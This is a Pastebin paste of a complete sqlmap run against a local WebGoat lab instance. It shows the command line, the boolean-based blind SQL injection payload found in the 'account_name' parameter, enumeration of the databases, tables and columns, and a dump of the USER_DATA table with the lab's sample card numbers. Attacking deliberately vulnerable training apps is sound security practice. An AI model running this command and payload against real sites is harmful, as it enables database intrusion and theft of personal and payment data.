Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $ python sqlmap.py -r webgoat.req --current-user --tables --columns -T user_data -D public --dbs --fresh-queries --safe-url "http://localhost:8080/WebGoat/service/restartlesson.mvc" --safe-freq=1 --flush-session --technique=B --dump
- _
- ___ ___| |_____ ___ ___ {1.0-dev-48619d9}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 12:59:57
- [12:59:57] [INFO] parsing HTTP request from 'webgoat.req'
- [12:59:57] [INFO] flushing session file
- [12:59:57] [INFO] testing connection to the target URL
- [12:59:57] [INFO] heuristics detected web page charset 'ascii'
- [12:59:57] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
- [12:59:57] [INFO] testing if the target URL is stable
- [12:59:58] [INFO] target URL is stable
- [12:59:58] [INFO] testing if POST parameter 'account_name' is dynamic
- [12:59:58] [INFO] confirming that POST parameter 'account_name' is dynamic
- [12:59:58] [INFO] POST parameter 'account_name' is dynamic
- [12:59:58] [INFO] heuristic (basic) test shows that POST parameter 'account_name' might be injectable (possible DBMS: 'HSQLDB')
- [12:59:58] [INFO] heuristic (XSS) test shows that POST parameter 'account_name' might be vulnerable to XSS attacks
- [12:59:58] [INFO] testing for SQL injection on POST parameter 'account_name'
- it looks like the back-end DBMS is 'HSQLDB'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
- for the remaining tests, do you want to include all tests for 'HSQLDB' extending provided level (1) and risk (1) values? [Y/n]
- [12:59:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [12:59:59] [WARNING] reflective value(s) found and filtering out
- [12:59:59] [INFO] POST parameter 'account_name' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
- [12:59:59] [INFO] checking if the injection point on POST parameter 'account_name' is a false positive
- POST parameter 'account_name' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
- sqlmap identified the following injection point(s) with a total of 15 HTTP(s) requests:
- ---
- Parameter: account_name (POST)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: account_name=Smith' AND 3939=3939 AND 'NMwC'='NMwC&SUBMIT=Go!
- ---
- [12:59:59] [INFO] testing HSQLDB
- [12:59:59] [INFO] confirming HSQLDB
- [12:59:59] [INFO] the back-end DBMS is HSQLDB
- [12:59:59] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
- [12:59:59] [INFO] retrieved:
- back-end DBMS: HSQLDB >= 1.7.2 and < 1.8.0
- [13:00:00] [INFO] fetching current user
- [13:00:00] [INFO] retrieved: SA
- current user: 'SA'
- [13:00:01] [INFO] fetching database names
- [13:00:01] [INFO] fetching number of databases
- [13:00:01] [INFO] retrieved: 2
- [13:00:01] [INFO] retrieved: INFORMATION_SCHEMA
- [13:00:02] [INFO] retrieved: PUBLIC
- available databases [2]:
- [*] INFORMATION_SCHEMA
- [*] PUBLIC
- [13:00:02] [INFO] fetching tables for database: 'PUBLIC'
- [13:00:02] [INFO] fetching number of tables for database 'PUBLIC'
- [13:00:02] [INFO] retrieved: 16
- [13:00:02] [INFO] retrieved: AUTH
- [13:00:02] [INFO] retrieved: EMPLOYEE
- [13:00:03] [INFO] retrieved: MESSAGES
- [13:00:03] [INFO] retrieved: MFE_IMAGES
- [13:00:04] [INFO] retrieved: OWNERSHIP
- [13:00:04] [INFO] retrieved: PINS
- [13:00:05] [INFO] retrieved: PRODUCT_SYSTEM_DATA
- [13:00:06] [INFO] retrieved: ROLES
- [13:00:06] [INFO] retrieved: SALARIES
- [13:00:06] [INFO] retrieved: TAN
- [13:00:07] [INFO] retrieved: TRANSACTIONS
- [13:00:07] [INFO] retrieved: USER_DATA
- [13:00:08] [INFO] retrieved: USER_DATA_TAN
- [13:00:08] [INFO] retrieved: USER_LOGIN
- [13:00:09] [INFO] retrieved: USER_SYSTEM_DATA
- [13:00:09] [INFO] retrieved: WEATHER_DATA
- Database: PUBLIC
- [16 tables]
- +---------------------+
- | AUTH |
- | EMPLOYEE |
- | MESSAGES |
- | MFE_IMAGES |
- | OWNERSHIP |
- | PINS |
- | PRODUCT_SYSTEM_DATA |
- | ROLES |
- | SALARIES |
- | TAN |
- | TRANSACTIONS |
- | USER_DATA |
- | USER_DATA_TAN |
- | USER_LOGIN |
- | USER_SYSTEM_DATA |
- | WEATHER_DATA |
- +---------------------+
- [13:00:10] [INFO] fetching columns for table 'USER_DATA' in database 'PUBLIC'
- [13:00:10] [INFO] retrieved: 7
- [13:00:10] [INFO] retrieved: CC_NUMBER
- [13:00:11] [INFO] retrieved: CC_NUMBER
- [13:00:11] [INFO] retrieved: CC_TYPE
- [13:00:12] [INFO] retrieved: CC_TYPE
- [13:00:13] [INFO] retrieved: COOKIE
- [13:00:13] [INFO] retrieved: COOKIE
- [13:00:14] [INFO] retrieved: FIRST_NAME
- [13:00:14] [INFO] retrieved: FIRST_NAME
- [13:00:15] [INFO] retrieved: LAST_NAME
- [13:00:16] [INFO] retrieved: LAST_NAME
- [13:00:16] [INFO] retrieved: LOGIN_COUNT
- [13:00:17] [INFO] retrieved: LOGIN_COUNT
- [13:00:18] [INFO] retrieved: USERID
- [13:00:19] [INFO] retrieved: USERID
- Database: PUBLIC
- Table: USER_DATA
- [7 columns]
- +-------------+-------------+
- | Column | Type |
- +-------------+-------------+
- | CC_NUMBER | CC_NUMBER |
- | CC_TYPE | CC_TYPE |
- | COOKIE | COOKIE |
- | FIRST_NAME | FIRST_NAME |
- | LAST_NAME | LAST_NAME |
- | LOGIN_COUNT | LOGIN_COUNT |
- | USERID | USERID |
- +-------------+-------------+
- [13:00:19] [INFO] fetching columns for table 'USER_DATA' in database 'PUBLIC'
- [13:00:19] [INFO] retrieved: 7
- [13:00:19] [INFO] retrieved: CC_NUMBER
- [13:00:20] [INFO] retrieved: CC_TYPE
- [13:00:21] [INFO] retrieved: COOKIE
- [13:00:21] [INFO] retrieved: FIRST_NAME
- [13:00:22] [INFO] retrieved: LAST_NAME
- [13:00:22] [INFO] retrieved: LOGIN_COUNT
- [13:00:23] [INFO] retrieved: USERID
- [13:00:24] [INFO] fetching entries for table 'USER_DATA' in database 'PUBLIC'
- [13:00:24] [INFO] fetching number of entries for table 'USER_DATA' in database 'PUBLIC'
- [13:00:24] [INFO] retrieved: 13
- [13:00:24] [INFO] retrieved: 13
- [13:00:24] [INFO] retrieved: 13
- [13:00:24] [INFO] retrieved: 13
- [13:00:24] [INFO] retrieved: 13
- [13:00:24] [INFO] retrieved: 13
- [13:00:25] [INFO] retrieved: 13
- [13:00:25] [INFO] retrieved: 13
- [13:00:25] [INFO] retrieved: 33843453533
- [13:00:25] [INFO] retrieved: AMEX
- [13:00:26] [INFO] retrieved:
- [13:00:26] [INFO] retrieved: Joesph
- [13:00:26] [INFO] retrieved: Something
- [13:00:27] [INFO] retrieved: 0
- [13:00:27] [INFO] retrieved: 15613
- [13:00:27] [INFO] retrieved: 338893453333
- [13:00:28] [INFO] retrieved: AMEX
- [13:00:28] [INFO] retrieved:
- [13:00:28] [INFO] retrieved: Peter
- [13:00:28] [INFO] retrieved: Sand
- [13:00:29] [INFO] retrieved: 0
- [13:00:29] [INFO] retrieved: 15603
- [13:00:29] [INFO] retrieved: 123609789
- [13:00:29] [INFO] retrieved: MC
- [13:00:30] [INFO] retrieved:
- [13:00:30] [INFO] retrieved: Peter
- [13:00:30] [INFO] retrieved: Sand
- [13:00:30] [INFO] retrieved: 0
- [13:00:30] [INFO] retrieved: 15603
- [13:00:31] [INFO] retrieved: 33413003333
- [13:00:31] [INFO] retrieved: AMEX
- [13:00:31] [INFO] retrieved:
- [13:00:32] [INFO] retrieved: Grumpy
- [13:00:32] [INFO] retrieved: youaretheweakestlink
- [13:00:33] [INFO] retrieved: 0
- [13:00:33] [INFO] retrieved: 10323
- [13:00:33] [INFO] retrieved: 673834489
- [13:00:34] [INFO] retrieved: MC
- [13:00:34] [INFO] retrieved:
- [13:00:34] [INFO] retrieved: Grumpy
- [13:00:34] [INFO] retrieved: youaretheweakestlink
- [13:00:35] [INFO] retrieved: 0
- [13:00:36] [INFO] retrieved: 10323
- [13:00:36] [INFO] retrieved: 333300003333
- [13:00:36] [INFO] retrieved: AMEX
- [13:00:37] [INFO] retrieved:
- [13:00:37] [INFO] retrieved: Jolly
- [13:00:37] [INFO] retrieved: Hershey
- [13:00:37] [INFO] retrieved: 0
- [13:00:38] [INFO] retrieved: 10312
- [13:00:38] [INFO] retrieved: 176896789
- [13:00:38] [INFO] retrieved: MC
- [13:00:38] [INFO] retrieved:
- [13:00:39] [INFO] retrieved: Jolly
- [13:00:39] [INFO] retrieved: Hershey
- [13:00:39] [INFO] retrieved: 0
- [13:00:39] [INFO] retrieved: 10312
- [13:00:40] [INFO] retrieved: 333498703333
- [13:00:40] [INFO] retrieved: AMEX
- [13:00:41] [INFO] retrieved:
- [13:00:41] [INFO] retrieved: Jane
- [13:00:41] [INFO] retrieved: Plane
- [13:00:41] [INFO] retrieved: 0
- [13:00:41] [INFO] retrieved: 103
- [13:00:41] [INFO] retrieved: 123456789
- [13:00:42] [INFO] retrieved: MC
- [13:00:42] [INFO] retrieved:
- [13:00:42] [INFO] retrieved: Jane
- [13:00:42] [INFO] retrieved: Plane
- [13:00:43] [INFO] retrieved: 0
- [13:00:43] [INFO] retrieved: 103
- [13:00:43] [INFO] retrieved: 4352209902222
- [13:00:44] [INFO] retrieved: AMEX
- [13:00:44] [INFO] retrieved:
- [13:00:44] [INFO] retrieved: John
- [13:00:44] [INFO] retrieved: Smith
- [13:00:45] [INFO] retrieved: 0
- [13:00:45] [INFO] retrieved: 102
- [13:00:45] [INFO] retrieved: 2435600002222
- [13:00:46] [INFO] retrieved: MC
- [13:00:46] [INFO] retrieved:
- [13:00:46] [INFO] retrieved: John
- [13:00:46] [INFO] retrieved: Smith
- [13:00:46] [INFO] retrieved: 0
- [13:00:46] [INFO] retrieved: 102
- [13:00:47] [INFO] retrieved: 2234200065411
- [13:00:47] [INFO] retrieved: MC
- [13:00:47] [INFO] retrieved:
- [13:00:48] [INFO] retrieved: Joe
- [13:00:48] [INFO] retrieved: Snow
- [13:00:48] [INFO] retrieved: 0
- [13:00:48] [INFO] retrieved: 101
- [13:00:48] [INFO] retrieved: 987654321
- [13:00:49] [INFO] retrieved: VISA
- [13:00:49] [INFO] retrieved:
- [13:00:49] [INFO] retrieved: Joe
- [13:00:49] [INFO] retrieved: Snow
- [13:00:50] [INFO] retrieved: 0
- [13:00:50] [INFO] retrieved: 101
- [13:00:50] [INFO] analyzing table dump for possible password hashes
- Database: PUBLIC
- Table: USER_DATA
- [13 entries]
- +--------+--------+---------+----------------------+---------------+------------+-------------+
- | USERID | COOKIE | CC_TYPE | LAST_NAME | CC_NUMBER | FIRST_NAME | LOGIN_COUNT |
- +--------+--------+---------+----------------------+---------------+------------+-------------+
- | 15613 | NULL | AMEX | Something | 33843453533 | Joesph | 0 |
- | 15603 | NULL | AMEX | Sand | 338893453333 | Peter | 0 |
- | 15603 | NULL | MC | Sand | 123609789 | Peter | 0 |
- | 10323 | NULL | AMEX | youaretheweakestlink | 33413003333 | Grumpy | 0 |
- | 10323 | NULL | MC | youaretheweakestlink | 673834489 | Grumpy | 0 |
- | 10312 | NULL | AMEX | Hershey | 333300003333 | Jolly | 0 |
- | 10312 | NULL | MC | Hershey | 176896789 | Jolly | 0 |
- | 103 | NULL | AMEX | Plane | 333498703333 | Jane | 0 |
- | 103 | NULL | MC | Plane | 123456789 | Jane | 0 |
- | 102 | NULL | AMEX | Smith | 4352209902222 | John | 0 |
- | 102 | NULL | MC | Smith | 2435600002222 | John | 0 |
- | 101 | NULL | MC | Snow | 2234200065411 | Joe | 0 |
- | 101 | NULL | VISA | Snow | 987654321 | Joe | 0 |
- +--------+--------+---------+----------------------+---------------+------------+-------------+
- [13:00:50] [INFO] table 'PUBLIC.USER_DATA' dumped to CSV file '/home/stamparm/.sqlmap/output/localhost/dump/PUBLIC/USER_DATA.csv'
- [13:00:50] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/localhost'
- [*] shutting down at 13:00:50
Advertisement
Add Comment
Please, Sign In to add comment